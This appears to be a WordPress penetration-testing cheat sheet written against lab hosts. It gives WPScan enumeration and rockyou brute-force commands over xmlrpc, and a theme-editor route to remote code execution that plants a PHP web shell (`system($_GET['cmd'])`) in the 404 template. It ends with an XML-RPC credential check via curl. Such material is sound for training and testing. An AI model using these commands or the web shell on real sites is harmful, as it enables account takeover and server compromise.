# Wordpress Pentesting

## WordPress Structure

```php
.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php
```

## WordPress User Roles

***

There are five types of users in a standard WordPress installation.

| Role          | Description                                                                                                                                            |
| ------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Administrator | This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code. |
| Editor        | An editor can publish and manage posts, including the posts of other users.                                                                            |
| Author        | Authors can publish and manage their own posts.                                                                                                        |
| Contributor   | These users can write and manage their own posts but cannot publish them.                                                                              |
| Subscriber    | These are normal users who can browse posts and edit their profiles.                                                                                   |

## WPScan

### Basic Scan

```
wpscan --url http://127.0.0.1
```

### Enumerate Plugins using WPScan

```bash
 wpscan --url http://94.237.49.182:58555/ --enumerate ap
```

### Enumerate Users using WPScan

```bash
wpscan --url http://94.237.49.182:58555/ --enumerate u
```

### WPScan Aggressive Mode Plugins

```python
wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60

```

### ALL in ONE WPSCAN Command

```python
wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force
```

### Normal WPSCAN Bruteforce Attack

```python
wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt
```

### &#x20;

### BruteForce attack using WPScan

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: `admin`, `roger`, and `david`. The tool uses two kinds of login brute force attacks, `xmlrpc` and `wp-login`. The `wp-login` method will attempt to brute force the normal WordPress login page, while the `xmlrpc` method uses the WordPress API to make login attempts through `/xmlrpc.php`. The `xmlrpc` method is preferred as it is faster.

```python
wpscan --password-attack xmlrpc -t 20 -U admin, david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FSUVC6wGQc0pb9gDWGJ8k%2Fimage.png?alt=media&#x26;token=cd64716e-4f22-4c27-be05-c112ae7c8613" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FeW1uZzffvOajYykf0Cm0%2Fimage.png?alt=media&#x26;token=dd23b0f2-39bf-41b8-aa10-98a7e129f2b5" alt=""><figcaption></figcaption></figure>

## RCE using ThemeEditor

we need to login as Administrator on WordPress Portal, then you need to go to theme editor page

edit the **404 theme** and add the reverse shell in it

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FHEGUyXi8CQQuI9bqqP6A%2Fimage.png?alt=media&#x26;token=18db73de-b4be-45d5-a203-8562f98e7606" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FcuDePGSkn1QgyeXHlCxo%2Fimage.png?alt=media&#x26;token=4d1e0c06-a247-4423-ae0a-38cb773a2aa5" alt=""><figcaption></figcaption></figure>

or you can also add the below code as well

```php
<?php
system($_GET['cmd']);
?>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Ft4Mzlpgb6tLYrfTENNWV%2Fimage.png?alt=media&#x26;token=d425babb-5ff8-40a0-9082-fd0ce5d82d48" alt=""><figcaption></figcaption></figure>

now save it and visit the below url to access it and execute it

```
http://<target>/wp-content/themes/twentyseventeen/404.php
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FRnu1JbjMuus3GumWWTn2%2Fimage.png?alt=media&#x26;token=780293ab-5cd2-496f-a055-cf4d58d46533" alt=""><figcaption></figcaption></figure>

and we have successfull RCE.

## XMLRPC.php&#x20;

It is important to note that `xmlrpc.php` being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed `xmlrpc.php` can facilitate some enumeration and exploitation activities, though.

if we have a username and password for the admin user we can try to get the information utilizing the xmlrpc.php&#x20;

```bash
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
```